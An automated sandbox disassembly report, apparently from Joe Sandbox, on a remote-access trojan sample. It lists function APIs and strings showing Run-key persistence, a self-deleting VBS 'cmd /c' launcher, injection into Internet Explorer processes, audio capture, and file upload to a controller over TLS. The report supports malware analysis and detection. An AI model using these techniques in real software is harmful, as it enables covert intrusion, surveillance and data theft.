Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040BA7B
Temp, xrefs: 0040BA43
""", 0, xrefs: 0040BB47
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040BB57
!G, xrefs: 0040B8F8

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
API String ID: 2743683619-2376316431
Opcode ID: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
Opcode Fuzzy Hash: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E

Function 0040BC59 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 259registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5

Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
ExitProcess.KERNEL32 ref: 0040BFD7

Strings

H"G, xrefs: 0040BD1C
"), xrefs: 0040BE6F
while fso.FileExists(", xrefs: 0040BE86
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040BE43
pth_unenc, xrefs: 0040BC60
wend, xrefs: 0040BF22
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040BCF6
On Error Resume Next, xrefs: 0040BE52
fso.DeleteFile ", xrefs: 0040BED3
fso.DeleteFolder ", xrefs: 0040BF48
open, xrefs: 0040BFCA
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040BF7F
.vbs, xrefs: 0040BDBF
Temp, xrefs: 0040BE04
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040BCA5
exepath, xrefs: 0040BD3F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2974882535
Opcode ID: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
Opcode Fuzzy Hash: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E

Function 00418FFD Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
SetEvent.KERNEL32 ref: 004191CF
WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
CloseHandle.KERNEL32 ref: 004191F0
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C

Strings

play audio, xrefs: 00419101
close audio, xrefs: 00419217
status audio mode, xrefs: 004191AD
stop audio, xrefs: 0041920D
pause audio, xrefs: 00419180
resume audio, xrefs: 00419198
stopped, xrefs: 004191B8
alias audio, xrefs: 0041906E
open ", xrefs: 00419086
" type , xrefs: 0041908B

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-1354618412
Opcode ID: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
Opcode Fuzzy Hash: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E

Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7

Strings

WAVE, xrefs: 00401AFD
RIFF, xrefs: 00401ADD
fmt , xrefs: 00401B0D
data, xrefs: 00401B91

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3

Function 00443268 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004432D8
_free.LIBCMT ref: 004432EE
_free.LIBCMT ref: 004432FF
_free.LIBCMT ref: 00443310
_free.LIBCMT ref: 00443327
GetCPInfo.KERNEL32(?,?), ref: 0044336F

Part of subcall function 00450054: _free.LIBCMT ref: 004500BF

_free.LIBCMT ref: 0044351B
_free.LIBCMT ref: 0044352E
_free.LIBCMT ref: 0044353C
_free.LIBCMT ref: 00443547
_free.LIBCMT ref: 00443589
_free.LIBCMT ref: 00443591
_free.LIBCMT ref: 00443599
_free.LIBCMT ref: 004435A1
_free.LIBCMT ref: 004435AF

Strings

e]j[/, xrefs: 00443270

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID: e]j[/
API String ID: 2509303402-424226671
Opcode ID: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
Opcode Fuzzy Hash: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24

Function 004137DC Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
LoadLibraryA.KERNEL32(?), ref: 0041386D
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
FreeLibrary.KERNEL32(00000000), ref: 00413894
LoadLibraryA.KERNEL32(?), ref: 004138CC
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
FreeLibrary.KERNEL32(00000000), ref: 004138E5
GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
FreeLibrary.KERNEL32(00000000), ref: 0041390B

Strings

`3A, xrefs: 00413933
\ws2_32, xrefs: 00413855
freeaddrinfo, xrefs: 00413808
\wship6, xrefs: 004138B4
getaddrinfo, xrefs: 004137E9, 00413887, 004138D8
getnameinfo, xrefs: 004137F8

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-3443138237
Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE

Function 0044C60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044C69F
_free.LIBCMT ref: 0044C6C5
_free.LIBCMT ref: 0044C6EE
_free.LIBCMT ref: 0044C726
_free.LIBCMT ref: 0044C757
_free.LIBCMT ref: 0044C798
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044C819
_free.LIBCMT ref: 0044C832
_wcschr.LIBVCRUNTIME ref: 0044C86F
_free.LIBCMT ref: 0044C8DB
_free.LIBCMT ref: 0044C901
_free.LIBCMT ref: 0044C92A
_free.LIBCMT ref: 0044C95F
_free.LIBCMT ref: 0044C990
_free.LIBCMT ref: 0044C9D1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044CA56
_free.LIBCMT ref: 0044CA6F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
Opcode Fuzzy Hash: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D

Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0044E4EA

Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7

_free.LIBCMT ref: 0044E4DF

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044E501
_free.LIBCMT ref: 0044E516
_free.LIBCMT ref: 0044E521
_free.LIBCMT ref: 0044E543
_free.LIBCMT ref: 0044E556
_free.LIBCMT ref: 0044E564
_free.LIBCMT ref: 0044E56F
_free.LIBCMT ref: 0044E5A7
_free.LIBCMT ref: 0044E5AE
_free.LIBCMT ref: 0044E5CB
_free.LIBCMT ref: 0044E5E3

Strings

pF, xrefs: 0044E4BC

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: pF
API String ID: 161543041-2973420481
Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18

Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980

Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5

Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
Sleep.KERNEL32(00000064), ref: 00411C63

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Strings

$.F, xrefs: 004119B6
/stext ", xrefs: 0041198C, 00411A2E, 00411ACD
@#G, xrefs: 00411D72
@#G, xrefs: 00411E45

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$$.F$@#G$@#G
API String ID: 1223786279-2596709126
Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A

Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044D828
_free.LIBCMT ref: 0044D84C
_free.LIBCMT ref: 0044D859
_free.LIBCMT ref: 0044D87E
_free.LIBCMT ref: 0044D88B
_free.LIBCMT ref: 0044D894
_free.LIBCMT ref: 0044DB72
_free.LIBCMT ref: 0044DB7A

Strings

pF, xrefs: 0044D80E, 0044DAF7

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free
String ID: pF
API String ID: 269201875-2973420481
Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754

Function 0040DE34 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 223processsynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040DE79
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23

Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133

Strings

Inj, xrefs: 0040E14F
ieinstal.exe, xrefs: 0040E0B9
!G, xrefs: 0040E061
ielowutil.exe, xrefs: 0040E0FA
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040E0A2
0"G, xrefs: 0040E02D

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
API String ID: 193334293-3226144251
Opcode ID: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
Opcode Fuzzy Hash: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A

Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
GetCursorPos.USER32(?), ref: 0041B39E
SetForegroundWindow.USER32(?), ref: 0041B3A7
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
ExitProcess.KERNEL32 ref: 0041B41A
CreatePopupMenu.USER32 ref: 0041B420
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435

Strings

Close, xrefs: 0041B426

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59

Function 00407BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
__aulldiv.LIBCMT ref: 00407D89

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
CloseHandle.KERNEL32(00000000), ref: 00407FA0
CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
CloseHandle.KERNEL32(00000000), ref: 00408038

Strings

SetFilePointerEx error, xrefs: 00408010
ReadFile error, xrefs: 00408004
Uploading file to Controller: , xrefs: 00407E11

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
API String ID: 3086580692-2596673759
Opcode ID: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
Opcode Fuzzy Hash: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B

Function 0041A47D Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32 ref: 0041A47F
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041A4B0
RegCloseKey.ADVAPI32(?), ref: 0041A749

Strings

DisplayName, xrefs: 0041A4C6
UninstallString, xrefs: 0041A52E
InstallLocation, xrefs: 0041A506
DisplayVersion, xrefs: 0041A4F2
Publisher, xrefs: 0041A4DB
InstallDate, xrefs: 0041A51A

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
API String ID: 1332880857-3730529168
Opcode ID: 990104b7cba7af691029d385b930f1776e062702f879198157bcb1f4d53fc8db
Instruction ID: 4431336161eaad6e2d2aa402c01db4654b3b7c935e82bf046b55a61e03329e01
Opcode Fuzzy Hash: 990104b7cba7af691029d385b930f1776e062702f879198157bcb1f4d53fc8db
Instruction Fuzzy Hash: 966132311182419BC328EB51D891EEFB3E8EF94348F50493FF586921E2EF749949CA5A

Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8

Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
ExitProcess.KERNEL32 ref: 0040C57D

Strings

H"G, xrefs: 0040C3C8
open, xrefs: 0040C56B
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040C520
.vbs, xrefs: 0040C418
Temp, xrefs: 0040C453
exepath, xrefs: 0040C3EA
""", 0, xrefs: 0040C49A
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C4B2

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
API String ID: 1913171305-2600661426
Opcode ID: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
Opcode Fuzzy Hash: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99

Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,?,?), ref: 004048C0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
WSAGetLastError.WS2_32 ref: 00404A01

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

TLS Authentication Failed, xrefs: 00404979
TLS Error 1, xrefs: 00404917
TLS Handshake... | , xrefs: 004048E4
